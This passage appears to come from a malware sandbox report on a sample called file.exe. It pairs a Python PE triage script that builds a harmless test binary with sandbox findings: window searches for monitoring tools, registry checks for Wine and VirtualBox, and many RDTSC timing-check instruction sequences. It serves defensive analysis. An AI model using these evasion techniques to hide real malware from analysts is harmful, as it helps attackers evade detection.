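    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                              # optional header follows the 20-byte COFF header
    sections = []
    for i in range(nsections):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw": data[rptr:rptr + rsize]})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum_offset": opt + 64,
            "stored_checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "sections": sections}


def triage(data: bytes) -> dict:
    """The four static indicators from the report, as a dict of findings."""
    pe = parse_pe(data)
    entry = next((s["name"] for s in pe["sections"]
                  if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["raw"]))), None)
    return {"checksum_valid": pe_checksum(data, pe["checksum_offset"]) == pe["stored_checksum"],
            "entry_section": entry,
            "entry_outside_standard": entry not in STANDARD_SECTIONS,
            "nonstandard_sections": [s["name"] for s in pe["sections"] if s["name"] not in STANDARD_SECTIONS],
            "high_entropy_sections": [s["name"] for s in pe["sections"] if shannon_entropy(s["raw"]) > 7.0]}


def build_sample_pe(fix_checksum: bool = False) -> bytes:
    """Constructed 32-bit PE: tiny .text, a pseudo-random 'mpjgkmbj' section and the
    entry point in a trailing '.taggant' section, with a bogus CheckSum unless fixed."""
    falign, salign = 0x200, 0x1000
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))   # 2 KiB, ~7.9 bits/byte
    bodies = [(b".text", b"\x31\xc0\xc3".ljust(falign, b"\0")),               # xor eax,eax ; ret
              (b"mpjgkmbj", packed),
              (b".taggant", b"\xe9\x00\x00\x00\x00".ljust(falign, b"\0"))]   # jmp +0
    section_headers, raw, rptr, va = b"", b"", falign, salign
    for name, body in bodies:
        section_headers += struct.pack("<8sIIIIIIHHI", name, len(body), va, len(body), rptr,
                                       0, 0, 0, 0, 0x60000020)              # CODE | EXECUTE | READ
        raw, rptr, va = raw + body, rptr + len(body), va + salign
    entry_rva = salign * 3                                                     # start of .taggant
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                         # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIII" + "HH" + "I" * 6,
                      0x10B, 14, 0, falign, len(packed), 0, entry_rva, salign, salign * 2,
                      0x400000, salign, falign, 6, 0, 0, 0, 6, 0, 0, va, falign, 0xDEADBEEF,
                      2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    image = (dos + coff + opt + section_headers).ljust(falign, b"\0") + raw
    if fix_checksum:
        off = 0x40 + 24 + 64                        # CheckSum lives at optional header + 64
        image = image[:off] + struct.pack("<I", pe_checksum(image, off)) + image[off + 4:]
    return image


if __name__ == "__main__":
    for flag, value in triage(build_sample_pe()).items():
        print(f"{flag:24} {value}")
```

A mismatching checksum on its own is weak evidence (many legitimate linkers leave the field zero), so the script reports all four findings together; on the constructed file only the packed section crosses the 7.0 entropy line, and the entry point resolves to .taggant, which is the combination the report flags for file.exe.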

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13421)
Source: C:\Users\user\Desktop\file.exe | File opened (registry key): HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened (registry key): HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D04F1F second address: D04F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D04F23 second address: D04F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1770B77EA4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D04F51 second address: D04F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F1770F379F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A260 second address: D0A26A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1770B77E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A26A second address: D0A285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1770F37A00h 0x00000008 jno 00007F1770F379F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A285 second address: D0A28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A6AA second address: D0A6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1770F37A01h 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F1770F379F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A6CA second address: D0A6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A9C7 second address: D0A9D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0A9D2 second address: D0A9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0D8F0 second address: D0D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0D9FE second address: D0DA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F1770B77E96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0DA0C second address: D0DA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0DAC8 second address: D0DAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1770B77EA5h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0DAEC second address: D0DB16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F1770F379F6h 0x00000010 pop edi 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jbe 00007F1770F379F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0DB16 second address: D0DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D0DBB0 second address: D0DBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F1770F37A04h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+122D27A0h], esi 0x00000015 jmp 00007F1770F37A07h 0x0000001a push 2C54A386h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
(Each entry is a pair of rdtsc reads bracketing junk instructions: pushad/popad, push and pop of the same register, and conditional jumps to the next instruction. The code compares the two timestamp counters; a cycle delta far larger than the few instructions in between indicates single-stepping, an emulator, or a hypervisor that traps rdtsc. The sandbox's RDTSC interceptor exists to keep that delta small.)
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBF5 second address: D0DBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBF9 second address: D0DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBFD second address: D0DC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1770B77E98h 0x0000000c popad 0x0000000d xor dword ptr [esp], 2C54A306h 0x00000014 mov dword ptr [ebp+122D1CE2h], eax 0x0000001a push 00000003h 0x0000001c add ecx, dword ptr [ebp+122D29C2h] 0x00000022 push 00000000h 0x00000024 je 00007F1770B77E9Ch 0x0000002a mov edi, dword ptr [ebp+122D1951h] 0x00000030 push 00000003h 0x00000032 mov edi, dword ptr [ebp+122D2B3Ah] 0x00000038 call 00007F1770B77E99h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F1770B77EA9h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DC5B second address: D0DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A02h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DC71 second address: D0DC97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F1770B77EA1h 0x0000000f pop esi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF773F second address: CF7745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7745 second address: CF774F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF774F second address: CF7767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F1770F379F6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7767 second address: CF776B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF776B second address: CF7784 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1770F379FCh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA87 second address: D2CA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA8B second address: D2CA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jl 00007F1770F37A0Eh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CC03 second address: D2CC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D11B second address: D2D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D11F second address: D2D12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F1770B77E96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D275 second address: D2D296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1770F379FBh 0x0000000d jmp 00007F1770F379FEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D296 second address: D2D29C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D29C second address: D2D2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1770F379FBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D2AC second address: D2D2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D3F9 second address: D2D3FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D3FF second address: D2D403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D403 second address: D2D407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D54A second address: D2D54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D7FA second address: D2D83C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 jnc 00007F1770F379F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1770F37A09h 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F1770F379F6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D83C second address: D2D840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D840 second address: D2D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D84C second address: D2D859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F1770B77E96h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF15F second address: CEF165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEF165 second address: CEF16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9AA second address: D2D9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770F37A06h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E118 second address: D2E11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E11C second address: D2E120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E120 second address: D2E136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1770B77EA0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3C9 second address: D2E3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F1770F379F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E3D5 second address: D2E3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E6B4 second address: D2E6BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1770F379F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32726 second address: D32743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32743 second address: D32749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFE68 second address: CFFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770B77EA3h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F1770B77E96h 0x00000012 jns 00007F1770B77E96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE37C second address: CFE3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F1770F37A00h 0x0000000b jmp 00007F1770F37A02h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0346A second address: D0347E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a jc 00007F1770B77EA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6DA second address: D3A6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1770F379F6h 0x0000000a popad 0x0000000b jmp 00007F1770F379FBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A6F0 second address: D3A70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77EA7h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9F0 second address: D3A9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A9F4 second address: D3AA0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AA0C second address: D3AA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AA15 second address: D3AA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F1770B77E98h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jc 00007F1770B77E96h 0x00000017 jmp 00007F1770B77E9Bh 0x0000001c pop edi 0x0000001d jmp 00007F1770B77EA8h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3ABB3 second address: D3ABDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1770F379FAh 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e jmp 00007F1770F37A00h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AEF3 second address: D3AF07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AF07 second address: D3AF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3AF0D second address: D3AF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1770B77E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B028 second address: D3B03E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F1770F379F6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B03E second address: D3B074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA2h 0x00000007 jbe 00007F1770B77E96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F1770B77EB5h 0x00000017 jmp 00007F1770B77E9Dh 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3B1C4 second address: D3B1CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C249 second address: D3C277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1770B77EA3h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jne 00007F1770B77E9Ch 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C3E7 second address: D3C3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C3ED second address: D3C3F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C5EC second address: D3C5F6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1770F379F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C6B2 second address: D3C6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3C87A second address: D3C880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D4BD second address: D3D4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D4C2 second address: D3D4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3D51E second address: D3D535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F1770B77E96h 0x00000011 rdtsc
